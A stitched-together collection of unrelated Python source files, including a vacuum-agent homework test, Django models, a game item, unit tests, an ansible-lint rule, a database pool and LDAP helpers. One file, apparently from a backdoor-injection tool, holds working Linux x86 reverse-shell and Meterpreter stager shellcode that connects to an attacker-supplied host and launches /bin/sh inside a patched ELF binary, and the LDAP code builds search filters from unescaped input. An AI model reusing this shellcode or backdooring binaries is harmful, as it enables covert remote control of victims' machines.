dirt = dirt_list | [0]
agent.performance += 100
| self.delete_thing(dirt)
else:
super(VacuumEnvironment, self).execute_action(agent, action)
if action != 'NoOp':
agent.performance -= 1
# # Launch a Text-Based Environment
# print('Two Cells, Agent on Left:')
# v = VacuumEnvironment(4, 3)
# v.add_thing(Dirt(), (1, 1))
# v.add_thing(Dirt(), (2, 1))
# a = v2.HW2Agent()
# a = ag.TraceAgent(a)
# v.add_thing(a, (1, 1))
# t = gui.EnvTUI(v)
# t.mapImageNames({
# ag.Wall: '#',
# Dirt: '@',
# ag.Agent: 'V',
# })
# t.step(0)
# t.list_things(Dirt)
# t.step(4)
# if len(t.env.get_things(Dirt)) > 0:
# t.list_things(Dirt)
# else:
# print('All clean!')
#
# # Check to continue
# if input('Do you want to continue [y/N]? ') != 'y':
# exit(0)
# else:
# print('----------------------------------------')
#
# # Repeat, but put Agent on the Right
# print('Two Cells, Agent on Right:')
# v = VacuumEnvironment(4, 3)
# v.add_thing(Dirt(), (1, 1))
# v.add_thing(Dirt(), (2, 1))
# a = v2.HW2Agent()
# a = ag.TraceAgent(a)
# v.add_thing(a, (2, 1))
# t = gui.EnvTUI(v)
# t.mapImageNames({
# ag.Wall: '#',
# Dirt: '@',
# ag.Agent: 'V',
# })
# t.step(0)
# t.list_things(Dirt)
# t.step(4)
# if len(t.env.get_things(Dirt)) > 0:
# t.list_things(Dirt)
# else:
# print('All clean!')
#
# # Check to continue
# if input('Do you want to continue [y/N]? ') != 'y':
# exit(0)
# else:
# print('----------------------------------------')
#
# # Repeat, but put Agent on the Right
# print('Two Cells, Agent on Top:')
# v = VacuumEnvironment(3, 4)
# v.add_thing(Dirt(), (1, 1))
# v.add_thing(Dirt(), (1, 2))
# a = v2.HW2Agent()
# a = ag.TraceAgent(a)
# v.add_thing(a, (1, 1))
# t = gui.EnvTUI(v)
# t.mapImageNames({
# ag.Wall: '#',
# Dirt: '@',
# ag.Agent: 'V',
# })
# t.step(0)
# t.list_things(Dirt)
# t.step(4)
# if len(t.env.get_things(Dirt)) > 0:
# t.list_things(Dirt)
# else:
# print('All clean!')
#
# # Check to continue
# if input('Do you want to continue [y/N]? ') != 'y':
# exit(0)
# else:
# print('----------------------------------------')
#
# # Repeat, but put Agent on the Right
# print('Two Cells, Agent on Bottom:')
# v = VacuumEnvironment(3, 4)
# v.add_thing(Dirt(), (1, 1))
# v.add_thing(Dirt(), (1, 2))
# a = v2.HW2Agent()
# a = ag.TraceAgent(a)
# v.add_thing(a, (1, 2))
# t = gui.EnvTUI(v)
# t.mapImageNames({
# ag.Wall: '#',
# Dirt: '@',
# ag.Agent: 'V',
# })
# t.step(0)
# t.list_things(Dirt)
# t.step(4)
# if len(t.env.get_things(Dirt)) > 0:
# t.list_things(Dirt)
# else:
# print('All clean!')
#
# # Check to continue
# if input('Do you want to continue [y/N]? ') != 'y':
# exit(0)
# else:
# print('----------------------------------------')
def testVacuum(label, w=4, h=3,
dloc=[(1,1),(2,1)],
vloc=(1,1),
limit=6):
print(label)
v = VacuumEnvironment(w, h)
for loc in dloc:
v.add_thing(Dirt(), loc)
a = v2.HW2Agent()
a = ag.TraceAgent(a)
v.add_thing(a, vloc)
t = gui.EnvTUI(v)
t.mapImageNames({
ag.Wall: '#',
Dirt: '@',
ag.Agent: 'V',
})
t.step(0)
t.list_things(Dirt)
t.step(limit)
if len(t.env.get_things(Dirt)) > 0:
t.list_things(Dirt)
else:
print('All clean!')
# Check to continue
if input('Do you want to continue [Y/n]? ') == 'n':
exit(0)
else:
print('----------------------------------------')
testVacuum('Two Cells, Agent on Left:')
testVacuum('Two Cells, Agent on Right:', vloc=(2,1))
testVacuum('Two Cells, Agent on Top:', w=3, h=4,
dloc=[(1,1), (1,2)], vloc=(1,1) )
testVacuum('Two Cells, Agent on Bottom:', w=3, h=4,
dloc=[(1,1), (1,2)], vloc=(1,2) )
testVacuum('Five Cells, Agent on Left:', w=7, h=3,
dloc=[(2,1), (4,1)], vloc=(1,1), limit=12)
testVacuum('Five Cells, Agent near Right:', w=7, h=3,
dloc=[(2,1), (3,1)], vloc=(4,1), limit=12)
testVacuum('Five Cells, Agent on Top:', w=3, h=7,
dloc=[(1,2), (1,4)], vloc=(1,1), limit=12 )
testVacuum('Five Cells, Agent Near Bottom:', w=3, h=7,
dloc=[(1,2), (1,3)], vloc=(1,4), limit=12 )
testVacuum('5x4 Grid, Agent in Top Left:', w=7, h=6,
dloc=[(1,4), (2,2), (3, 3), (4,1), (5,2)],
vloc=(1,1), limit=46 )
testVacuum('5x4 Grid, Agent near Bottom Right:', w=7, h=6,
dloc=[(1,3), (2,2), (3, 4), (4,1), (5,2)],
vloc=(4, 3), limit=46 )
v = VacuumEnvironment(6, 3)
a = v2.HW2Agent()
a = ag.TraceAgent(a)
loc = v.random_location_inbounds()
v.add_thing(a, location=loc)
v.scatter_things(Dirt)
g = gui.EnvGUI(v, 'Vaccuum')
c = g.getCanvas()
c.mapImageNames({
ag.Wall: 'images/wall.jpg',
# Floor: 'images/floor.png',
Dirt: 'images/dirt.png',
ag.Agent: 'images/vacuum.png',
})
c.update()
g.mainloop() |
'''
Author Joshua Pitts the.midnite.runr 'at' gmail <d ot > com
Copyright (C) 2013,2014, Joshua Pitts
License: GPLv3
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. | See the
GNU General Public License for more details.
See <http://www.gnu.org/licenses/> for a copy of the GNU General
Public License
Currently supports win32/64 PE and linux32/64 ELF only(intel architecture).
This program is to be used for only legal activities by IT security
professionals and researchers. Author not responsible for malicious
uses.
'''
import struct
import sys
class linux_elfI32_shellcode():
"""
Linux | ELFIntel x32 shellcode class
"""
def __init__(self, HOST, PORT, e_entry, SUPPLIED_SHELLCODE=None):
#could take this out HOST/PORT and put into each shellcode function
self.HOST = HOST
self.PORT = PORT
self.e_entry = e_entry
self.SUPPLIED_SHELLCODE = SUPPLIED_SHELLCODE
self.shellcode = ""
self.stackpreserve = "\x90\x90\x60\x9c"
self.stackrestore = "\x9d\x61"
def pack_ip_addresses(self):
hostocts = []
if self.HOST is None:
print "This shellcode requires a HOST parameter -H"
sys.exit(1)
for i, octet in enumerate(self.HOST.split('.')):
hostocts.append(int(octet))
self.hostip = struct.pack('=BBBB', hostocts[0], hostocts[1],
hostocts[2], hostocts[3])
return self.hostip
def returnshellcode(self):
return self.shellcode
def reverse_shell_tcp(self, CavesPicked={}):
"""
Modified metasploit linux/x64/shell_reverse_tcp shellcode
to correctly fork the shellcode payload and contiue normal execution.
"""
if self.PORT is None:
print ("Must provide port")
sys.exit(1)
self.shellcode1 = "\x6a\x02\x58\xcd\x80\x85\xc0\x74\x07"
#will need to put resume execution shellcode here
self.shellcode1 += "\xbd"
self.shellcode1 += struct.pack("<I", self.e_entry)
self.shellcode1 += "\xff\xe5"
self.shellcode1 += ("\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80"
"\x93\x59\xb0\x3f\xcd\x80\x49\x79\xf9\x68")
#HOST
self.shellcode1 += self.pack_ip_addresses()
self.shellcode1 += "\x68\x02\x00"
#PORT
self.shellcode1 += struct.pack('!H', self.PORT)
self.shellcode1 += ("\x89\xe1\xb0\x66\x50\x51\x53\xb3\x03\x89\xe1"
"\xcd\x80\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3"
"\x52\x53\x89\xe1\xb0\x0b\xcd\x80")
self.shellcode = self.shellcode1
return (self.shellcode1)
def reverse_tcp_stager(self, CavesPicked={}):
"""
FOR USE WITH STAGER TCP PAYLOADS INCLUDING METERPRETER
Modified metasploit linux/x64/shell/reverse_tcp shellcode
to correctly fork the shellcode payload and contiue normal execution.
"""
if self.PORT is None:
print ("Must provide port")
sys.exit(1)
self.shellcode1 = "\x6a\x02\x58\xcd\x80\x85\xc0\x74\x07"
#will need to put resume execution shellcode here
self.shellcode1 += "\xbd"
self.shellcode1 += struct.pack("<I", self.e_entry)
self.shellcode1 += "\xff\xe5"
self.shellcode1 += ("\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\xb0\x66\x89\xe1\xcd\x80"
"\x97\x5b\x68")
#HOST
self.shellcode1 += self.pack_ip_addresses()
self.shellcode1 += "\x68\x02\x00"
#PORT
self.shellcode1 += struct.pack('!H', self.PORT)
self.shellcode1 += ("\x89\xe1\x6a"
"\x66\x58\x50\x51\x57\x89\xe1\x43\xcd\x80\xb2\x07\xb9\x00\x10"
"\x00\x00\x89\xe3\xc1\xeb\x0c\xc1\xe3\x0c\xb0\x7d\xcd\x80\x5b"
"\x89\xe1\x99\xb6\x0c\xb0\x03\xcd\x80\xff\xe1")
self.shellcode = self.shellcode1
return (self.shellcode1)
def user_supplied_shellcode(self, CavesPicked={}):
"""
For user with position independent shellcode from the user
"""
if self.SUPPLIED_SHELLCODE is None:
print "[!] User must provide shellcode for this module (-U)"
sys.exit(0)
else:
supplied_shellcode = open(self.SUPPLIED_SHELLCODE, 'r+b').read()
self.shellcode1 = "\x6a\x02\x58\xcd\x80\x85\xc0\x74\x07"
#will need to put resume execution shellcode here
self.shellcode1 += "\xbd"
self.shellcode1 += struct.pack("<I", self.e_entry)
self.shellcode1 += "\xff\xe5"
self.shellcode1 += supplied_shellcode
self.shellcode = self.shellcode1
return (self.shellcode1)
|
from djan | go.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('cms', '0014_auto_20160404_1908'),
]
operations = [
migrations.AlterField(
model_name='cmsplugin',
name='position',
field=models.PositiveSmallIntegerField(default=0, verbose_name='position', editable=False),
),
| ]
|
from . import | font
from .indicator import Indicator, IndicatorOptions
from .airspeed import AirspeedIndicator
from .altitude import AltitudeIn | dicator
from .attitude import AttitudeIndicator
from .compass import CompassIndicator
from .pfd import PFD
from .joystick import Joystick
from . import base_test
|
import src
import random
class Bomb(src.items.Item):
"""
ingame item to kill things and destroy stuff
"""
type = "Bomb"
name = "bomb"
description = "designed to explode"
usageInfo = """
The explosion will damage/destroy | everything on the current tile or the container.
Activate it to trigger a exlosion.
"""
bolted = False
walkable = True
def __init__(self):
"""
initialise state
"""
super().__init__(display=src.canvas.displayChars.bomb)
def apply(self, character):
"""
handle a character trying to use this item
by exploding
Parameters:
| character: the character trying to use this item
"""
character.addMessage("the bomb starts to fizzle")
event = src.events.RunCallbackEvent(
#src.gamestate.gamestate.tick+random.randint(1,4)+delay
src.gamestate.gamestate.tick+1
)
event.setCallback({"container": self, "method": "destroy"})
self.container.addEvent(event)
def destroy(self, generateScrap=True):
"""
destroy the item
Parameters:
generateScrap: flag to toggle leaving residue
"""
if not self.xPosition or not self.yPosition:
return
offsets = [(0,0),(1,0),(-1,0),(0,1),(0,-1)]
random.shuffle(offsets)
delay = 1
if isinstance(self.container,src.rooms.Room):
delay = 2
for offset in offsets[:-1]:
new = src.items.itemMap["Explosion"]()
self.container.addItem(new,(self.xPosition-offset[0],self.yPosition-offset[1],self.zPosition))
event = src.events.RunCallbackEvent(
src.gamestate.gamestate.tick + delay
)
event.setCallback({"container": new, "method": "explode"})
self.container.addEvent(event)
super().destroy(generateScrap=False)
src.items.addType(Bomb)
|
from django.db imp | ort models
class Salary(models.Model):
id = models.AutoField(primary_key = True)
bh = models.CharField(max_length = 10)
xm = models.CharField(max_length = 12)
status = models.CharField(max_length = 8)
c | lass Meta:
db_table = 'swan_salary'
def __str__(self):
return self.id
|
import unittest
import serializer
__author__ = 'peter'
class SerializationTests(unittest.TestCase):
def tes | t_serialize_single_key_value_pair(self):
input = [{ 'name': 'value' }]
expected_output = "name=value"
output = serializer.serialize(input)
self.assertEquals(cmp(expected_output, output), 0)
def test_serialize_non_string_type(self):
input = [{ 'name': 5.0 }]
expected_output = "name=5.0"
output = serializ | er.serialize(input)
self.assertEquals(cmp(expected_output, output), 0)
def test_serialize_single_key_multi_value(self):
input = [{ 'name': ['first', 'second']}]
expected_output = 'name={\r\n\tfirst\r\n\tsecond\r\n}'
output = serializer.serialize(input)
self.assertEquals(cmp(expected_output, output), 0)
def test_serialize_nested_key(self):
input = [{ 'name': [{'sub_name': 'derp'}]}]
expected_output = 'name={\r\n\tsub_name=derp\r\n}'
output = serializer.serialize(input)
self.assertEquals(cmp(expected_output, output), 0)
def test_serialize_array_of_kvps(self):
input = [{'name one': 'value one'},{'name two':'value two'}]
expected_output = 'name one=value one\r\nname two=value two'
output = serializer.serialize(input)
self.assertEquals(cmp(expected_output, output), 0)
def test_serialize_nested_array(self):
input = [{ 'name': [{'sub_name': 'derp'}, {'sub_name_2': 'derp2'}]}]
expected_output = 'name={\r\n\tsub_name=derp\r\n\tsub_name_2=derp2\r\n}'
output = serializer.serialize(input)
self.assertEquals(cmp(expected_output, output), 0)
def test_serialize_doubly_nested_key(self):
input = [{ 'name': [{'sub_name': 'derp'}, {'sub_name_2': [{'more_nesting':'a thing'}]}]}]
expected_output = 'name={\r\n\tsub_name=derp\r\n\tsub_name_2={\r\n\t\tmore_nesting=a thing\r\n\t}\r\n}'
output = serializer.serialize(input)
self.assertEquals(cmp(expected_output, output), 0) |
#!/usr/bin/python
# -*- coding: utf-8 -*-
"""
This file is part of XBMC Mega Pack Addon.
Copyright (C) 2014 Wolverine (xbmcmegapack | @gmail.com)
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hop | e that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License along
with this program. If not, see http://www.gnu.org/licenses/gpl-3.0.html
"""
class Countries_Virgin_islands_us():
'''Class that manages this specific menu context.'''
def open(self, plugin, menu):
menu.add_xplugins(plugin.get_xplugins(dictionaries=["Channels",
"Events", "Live", "Movies", "Sports", "TVShows"],
countries=["Virgin Islands, U.S."])) |
# Copyright (c) 2013-2014 Will Thames <will@thames.id.au>
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Softwar | e without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# | copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
from ansiblelint.rules import AnsibleLintRule
class GitHasVersionRule(AnsibleLintRule):
id = '401'
shortdesc = 'Git checkouts must contain explicit version'
description = (
'All version control checkouts must point to '
'an explicit commit or tag, not just ``latest``'
)
severity = 'MEDIUM'
tags = ['module', 'repeatability', 'ANSIBLE0004']
version_added = 'historic'
def matchtask(self, file, task):
return (task['action']['__ansible_module__'] == 'git' and
task['action'].get('version', 'HEAD') == 'HEAD')
|
or frustrating debugging if stderr is directed
to our wrapper. So be paranoid about catching errors and reporting them
to sys.__stderr__, so that the user has a higher chance to see them.
"""
print(
isinstance(message, str) and message or repr(message),
file=sys.__stderr__)
def fix_default_encoding():
"""Forces utf8 solidly on all platforms.
By default python execution environment is lazy and defaults to ascii
encoding.
http://uucode.com/blog/2007/03/23/shut-up-you-dummy-7-bit-python/
"""
if sys.getdefaultencoding() == 'utf-8':
return False
# Regenerate setdefaultencoding.
reload(sys)
# Module 'sys' has no 'setdefaultencoding' member
# pylint: disable=no-member
sys.setdefaultencoding('utf-8')
for attr in dir(locale):
if attr[0:3] != 'LC_':
continue
aref = getattr(locale, attr)
try:
locale.setlocale(aref, '')
except locale.Error:
continue
try:
lang, _ = locale.getdefaultlocale()
except (TypeError, ValueError):
continue
if lang:
try:
locale.setlocale(aref, (lang, 'UTF-8'))
except locale.Error:
os.environ[attr] = lang + '.UTF-8'
try:
locale.setlocale(locale.LC_ALL, '')
except locale.Error:
pass
return True
###############################
# Windows specific
def fix_win_sys_argv(encoding):
"""Converts sys.argv to 'encoding' encoded string.
utf-8 is recommended.
Works around <http://bugs.python.org/issue2128>.
"""
global _SYS_ARGV_PROCESSED
if _SYS_ARGV_PROCESSED:
return False
if sys.version_info.major == 3:
_SYS_ARGV_PROCESSED = True
return True
# These types are available on linux but not Mac.
# pylint: disable=no-name-in-module,F0401
from ctypes import byref, c_int, POINTER, windll, WINFUNCTYPE
from ctypes.wintypes import LPCWSTR, LPWSTR
# <http://msdn.microsoft.com/en-us/library/ms683156.aspx>
GetCommandLineW = WINFUNCTYPE(LPWSTR)(('GetCommandLineW', windll.kernel32))
# <http://msdn.microsoft.com/en-us/library/bb776391.aspx>
CommandLineToArgvW = WINFUNCTYPE(POINTER(LPWSTR), LPCWSTR, POINTER(c_int))(
('CommandLineToArgvW', windll.shell32))
argc = c_int(0)
argv_unicode = CommandLineToArgvW(GetCommandLineW(), byref(argc))
argv = [
argv_unicode[i].encode(encoding, 'replace') for i in range(0, argc.value)
]
if not hasattr(sys, 'frozen'):
# If this is an executable produced by py2exe or bbfreeze, then it
# will have been invoked directly. Otherwise, unicode_argv[0] is the
# Python interpreter, so skip that.
argv = argv[1:]
# Also skip option arguments to the Python interpreter.
while len(argv) > 0:
arg = argv[0]
if not arg.startswith(b'-') or arg == b'-':
break
argv = argv[1:]
if arg == u'-m':
# sys.argv[0] should really be the absolute path of the
# module source, but never mind.
break
if arg == u'-c':
argv[0] = u'-c'
break
sys.argv = argv
_SYS_ARGV_PROCESSED = True
return True
def fix_win_codec():
"""Works around <http://b | ugs.python.org/issue6058>."""
# <http://msdn.microsoft.com/en-us/library/dd317756.aspx>
try:
codecs.lookup('cp65001')
return False
except LookupError:
codecs.register(
lambda name: name == 'cp65001' and codecs.lookup('utf-8') or None)
return True
class WinUnicodeOutputBase(object):
"""Base class to adapt sy | s.stdout or sys.stderr to behave correctly on
Windows.
Setting encoding to utf-8 is recommended.
"""
def __init__(self, fileno, name, encoding):
# Corresponding file handle.
self._fileno = fileno
self.encoding = encoding
self.name = name
self.closed = False
self.softspace = False
self.mode = 'w'
@staticmethod
def isatty():
return False
def close(self):
# Don't really close the handle, that would only cause problems.
self.closed = True
def fileno(self):
return self._fileno
def flush(self):
raise NotImplementedError()
def write(self, text):
raise NotImplementedError()
def writelines(self, lines):
try:
for line in lines:
self.write(line)
except Exception as e:
complain('%s.writelines: %r' % (self.name, e))
raise
class WinUnicodeConsoleOutput(WinUnicodeOutputBase):
"""Output adapter to a Windows Console.
Understands how to use the win32 console API.
"""
def __init__(self, console_handle, fileno, stream_name, encoding):
super(WinUnicodeConsoleOutput, self).__init__(
fileno, '<Unicode console %s>' % stream_name, encoding)
# Handle to use for WriteConsoleW
self._console_handle = console_handle
# Loads the necessary function.
# These types are available on linux but not Mac.
# pylint: disable=no-name-in-module,F0401
from ctypes import byref, GetLastError, POINTER, windll, WINFUNCTYPE
from ctypes.wintypes import BOOL, DWORD, HANDLE, LPWSTR
from ctypes.wintypes import LPVOID # pylint: disable=no-name-in-module
self._DWORD = DWORD
self._byref = byref
# <http://msdn.microsoft.com/en-us/library/ms687401.aspx>
self._WriteConsoleW = WINFUNCTYPE(
BOOL, HANDLE, LPWSTR, DWORD, POINTER(DWORD), LPVOID)(
('WriteConsoleW', windll.kernel32))
self._GetLastError = GetLastError
def flush(self):
# No need to flush the console since it's immediate.
pass
def write(self, text):
try:
if sys.version_info.major == 2 and not isinstance(text, unicode):
# Convert to unicode.
text = str(text).decode(self.encoding, 'replace')
elif sys.version_info.major == 3 and isinstance(text, bytes):
# Bytestrings need to be decoded to a string before being passed to
# Windows.
text = text.decode(self.encoding, 'replace')
remaining = len(text)
while remaining > 0:
n = self._DWORD(0)
# There is a shorter-than-documented limitation on the length of the
# string passed to WriteConsoleW. See
# <http://tahoe-lafs.org/trac/tahoe-lafs/ticket/1232>.
retval = self._WriteConsoleW(
self._console_handle, text,
min(remaining, 10000),
self._byref(n), None)
if retval == 0 or n.value == 0:
raise IOError(
'WriteConsoleW returned %r, n.value = %r, last error = %r' % (
retval, n.value, self._GetLastError()))
remaining -= n.value
if not remaining:
break
text = text[int(n.value):]
except Exception as e:
complain('%s.write: %r' % (self.name, e))
raise
class WinUnicodeOutput(WinUnicodeOutputBase):
"""Output adaptor to a file output on Windows.
If the standard FileWrite function is used, it will be encoded in the current
code page. WriteConsoleW() permits writing any character.
"""
def __init__(self, stream, fileno, encoding):
super(WinUnicodeOutput, self).__init__(
fileno, '<Unicode redirected %s>' % stream.name, encoding)
# Output stream
self._stream = stream
# Flush right now.
self.flush()
def flush(self):
try:
self._stream.flush()
except Exception as e:
complain('%s.flush: %r from %r' % (self.name, e, self._stream))
raise
def write(self, text):
try:
if sys.version_info.major == 2 and isinstance(text, unicode):
# Replace characters that cannot be printed instead of failing.
text = text.encode(self.encoding, 'replace')
if sys.version_info.major == 3 and isinstance(text, bytes):
# Replace characters that cannot be printed instead of failing.
text = text.decode(self.encoding, 'replace')
self._stream.write(text)
except Exception as e:
complain('%s.write: %r' % (self.name, e))
raise
def win_handle_is_a_console(handle):
"""Returns True if a Windows file handle is a handle to a console."""
# These types are available on linux but not Mac.
# pylint: disable=no-name-in-module,F0401
from ctypes import byref, POINTER, windll, WINFUNCTYPE
from ctypes.wintypes import BOOL, DWORD, HANDLE
FILE_TYPE_CHAR = 0x00 |
import sqlalchemy.pool
import time
import math
class S | AAutoPool(sqlalchemy.pool.QueuePool):
""" A pool class similar to QueuePool but rather than holding some
minimum number of connections open makes an estimate of how many
connections are needed.
The goal is that new connections should be opened at most once every few
seconds and shouldn't create so many that there | will be many idle. """
def __init__(self, creator, pool_size=20, open_interval=5, **kw):
""" Create a new SAAutoPool.
pool_size is passed to to the QueuePool parent. You shouldn't need
to adjust this, it's more to provide a hard maximum on the number of
connections.
open_interval is the target interval between the opening of new
connections, in seconds. The default 5 means to aim for opening a
new connection on average once every 5 seconds. """
super(SAAutoPool, self).__init__(creator, pool_size=pool_size, **kw)
self.open_interval = open_interval
# Start at an expected 5 connections, to avoid large churn on
# startup. The 5 is based on the default 5 in QueuePool.
self.mean = 5
self.rate = 1
self.last_ts = self._get_time()
self.qsize = 1
self.next_update = 0
self.decay_rate = math.log(0.5)/60
def _get_time(self):
# Internal function to allow overriding, primarily for testing.
return time.time()
def _update_qsize(self, ts, checkout):
# An weighted average, where one minute ago counts half as much.
w = math.exp( (ts-self.last_ts)*self.decay_rate )
self.last_ts = ts
self.rate = w*self.rate
if checkout:
self.rate += (1-math.exp(self.decay_rate))
level = self.checkedout()
self.mean = w*self.mean + (1-w)*level
if ts > self.next_update:
# The idea is that if we know there are 20 checkouts per second,
# then we want to aim that only 5% of checkouts lead to an
# actual new connection. The number of actual connections is
# tracked by the mean, so by using the inverse CDF of the
# Poisson distribtion we can calculate how many connections we
# actually need to acheive this target.
self.qsize = self._inv_cdf_poisson( 1-(1.0/max(2, self.open_interval*self.rate)), self.mean )
self.next_update = ts+1
@staticmethod
def _inv_cdf_poisson(p, mu):
""" Stupid simple inverse poisson distribution. Actually 1 too high, but that's OK here """
x = 0
n = 0
while x < p:
x += math.exp(-mu)*math.pow(mu, n)/math.factorial(n)
n += 1
return n
def _do_get(self):
self._update_qsize(self._get_time(), True)
conn = super(SAAutoPool, self)._do_get()
# print ">>> last_ts=%.1f ci=%d co=%d=%d-%d+%d qsize=%d" % (self.last_ts, self.checkedin(), self.checkedout(), self._pool.maxsize, self._pool.qsize(), self._overflow, self.qsize)
return conn
def _do_return_conn(self, conn):
self._update_qsize(self._get_time(), False)
super(SAAutoPool, self)._do_return_conn(conn)
# If there's a connection in the pool and the total connections exceeds the limit, close it.
if self.checkedin() > 0 and self.qsize < self.checkedin() + self.checkedout():
conn = self._pool.get()
conn.close()
# This is needed so the connection level count remains accurate
self._dec_overflow()
# print "<<< last_ts=%.1f ci=%d co=%d=%d-%d+%d qsize=%d" % (self.last_ts, self.checkedin(), self.checkedout(), self._pool.maxsize, self._pool.qsize(), self._overflow, self.qsize)
|
#!/usr/bin/env python
# -*- encoding: utf-8 -*-
#
# Copyright (c) 2017 Ste | phen Bunn (stephen@bunn.io | )
# GNU GPLv3 <https://www.gnu.org/licenses/gpl-3.0.en.html>
from ._common import *
from .rethinkdb import RethinkDBPipe
from .mongodb import MongoDBPipe
|
lass LdapSearchException(Exception):
pass
def get_connection_from_server(server=None):
ldap_servers = desktop.conf.LDAP.LDAP_SERVERS.get()
if server and ldap_servers:
ldap_config = ldap_servers[server]
else:
ldap_config = desktop.conf.LDAP
return get_connection(ldap_config)
def get_connection(ldap_config):
global CACHED_LDAP_CONN
if CACHED_LDAP_CONN is not None:
return CACHED_LDAP_CONN
ldap_url = ldap_config.LDAP_URL.get()
username = ldap_config.BIND_DN.get()
password = desktop.conf.get_ldap_bind_password(ldap_config)
ldap_cert = ldap_config.LDAP_CERT.get()
search_bind_authentication = ldap_config.SEARCH_BIND_AUTHENTICATION.get()
if ldap_url is None:
raise Exception('No LDAP URL was specified')
if search_bind_authentication:
return LdapConnection(ldap_config, ldap_url, username, password, ldap_cert)
else:
return LdapConnection(ldap_config, ldap_url, get_ldap_username(username, ldap_config.NT_DOMAIN.get()), password, ldap_cert)
def get_ldap_username(username, nt_domain):
if nt_domain:
return '%s@%s' % (username, nt_domain)
else:
return username
def get_ldap_user_kwargs(username):
if desktop.conf.LDAP.IGNORE_USERNAME_CASE.get():
return {
'username__iexact': username
}
else:
return {
'username': username
}
def get_ldap_user(username):
username_kwargs = get_ldap_user_kwargs(username)
return User.objects.get(**username_kwargs)
def get_or_create_ldap_user(username):
username_kwargs = get_ldap_user_kwargs(username)
users = User.objects.filter(**username_kwargs)
if users.exists():
return User.objects.get(**username_kwargs), False
else:
username = desktop.conf.LDAP.FORCE_USERNAME_LOWERCASE.get() and username.lower() or username
return User.objects.create(username=username), True
class LdapConnection(object):
"""
Constructor creates LDAP connection. Contains methods
to easily query an LDAP server.
"""
def __init__(self, ldap_config, ldap_url, bind_user=None, bind_password=None, cert_file=None):
"""
Constructor initializes the LDAP connection
"""
self.ldap_config = ldap_config
if cert_file is not None:
ldap.set_option(ldap.OPT_X_TLS_REQUIRE_CERT, ldap.OPT_X_TLS_ALLOW)
ldap.set_option(ldap.OPT_X_TLS_CACERTFILE, cert_file)
if self.ldap_config.FOLLOW_REFERRALS.get():
ldap.set_option(ldap.OPT_REFERRALS, 1)
else:
ldap.set_option(ldap.OPT_REFERRALS, 0)
if ldap_config.DEBUG.get():
ldap.set_option(ldap.OPT_DEBUG_LEVEL, ldap_config.DEBUG_LEVEL.get())
self.ldap_handle = ldap.initialize(uri=ldap_url, trace_level=ldap_config.TRACE_LEVEL.get())
if bind_user is not None:
try:
self.ldap_handle.simple_bind_s(bind_user, bind_password)
except:
msg = "Failed to bind to LDAP server as user %s" % bind_user
LOG.exception(msg)
raise LdapBindException(msg)
else:
try:
# Do anonymous bind
self.ldap_handle.simple_bind_s('','')
except:
msg = "Failed to bind to LDAP server anonymously"
LOG.exception(msg)
raise LdapBindException(msg)
def _get_search_params(self, name, attr, find_by_dn=False):
"""
if we are to find this ldap object by full distinguished name,
then search by setting search_dn to the 'name'
rather than by filtering by 'attr'.
"""
base_dn = self._get_root_dn()
if find_by_dn:
search_dn = re.sub(r'(\w+=)', lambda match: match.group(0).upper(), name)
if not search_dn.upper().endswith(base_dn.upper()):
raise LdapSearchException("Distinguished Name provided does not contain configured Base DN. Base DN: %(base_dn)s, DN: %(dn)s" % {
'base_dn': base_dn,
'dn': search_dn
})
return (search_dn, '')
else:
return (base_dn, '(' + attr + '=' + name + ')')
def _transform_find_user_results(self, result_data, user_name_attr):
"""
:param result_data: List of dictionaries that have ldap attributes and their associated values. Generally the result list from an ldapsearch request.
:param user_name_attr: The ldap attribute that is returned by the server to map to ``username`` in the return dictionary.
:returns list of dictionaries that take on the following form: {
'dn': <distinguished name of entry>,
'username': <ldap attribute associated with user_name_attr>
'first': <first name>
'last': <last name>
'email': <email>
'groups': <list of DNs of groups that user is a member of>
}
"""
user_info = []
if result_data:
for dn, data in result_data:
# Skip Active Directory # refldap entries.
if dn is not None:
# Case insensitivity
data = CaseInsensitiveDict.from_dict(data)
# Skip unnamed entries.
if user_name_attr not in data:
LOG.warn('Could not find %s in ldap attributes' % user_name_attr)
continue
ldap_info = {
'dn': dn,
'username': data[user_name_attr][0]
}
if 'givenName' in data:
ldap_info['first'] = data['givenName'][0]
if 'sn' in data:
ldap_info['last'] = data['sn'][0]
if 'mail' in data:
ldap_info['email'] = data['mail'][0]
# memberOf and isMemberOf should be the same if they both exist
if 'memberOf' in data:
ldap_info['groups'] = data['memberOf']
if 'isMemberOf' in data:
ldap_info['groups'] = data['isMemberOf']
user_info.append(ldap_info)
return user_info
def _transform_find_group_results(self, result_data, group_name_attr, group_member_attr):
group_info = []
| if result_data:
for dn, data in result_data:
# Skip Active Directory # refldap entries.
if dn is not None:
# Case insensitivity
data = CaseInsensitiveDict.from_dict(data)
# Skip unnamed entries.
if group_name_attr not in data:
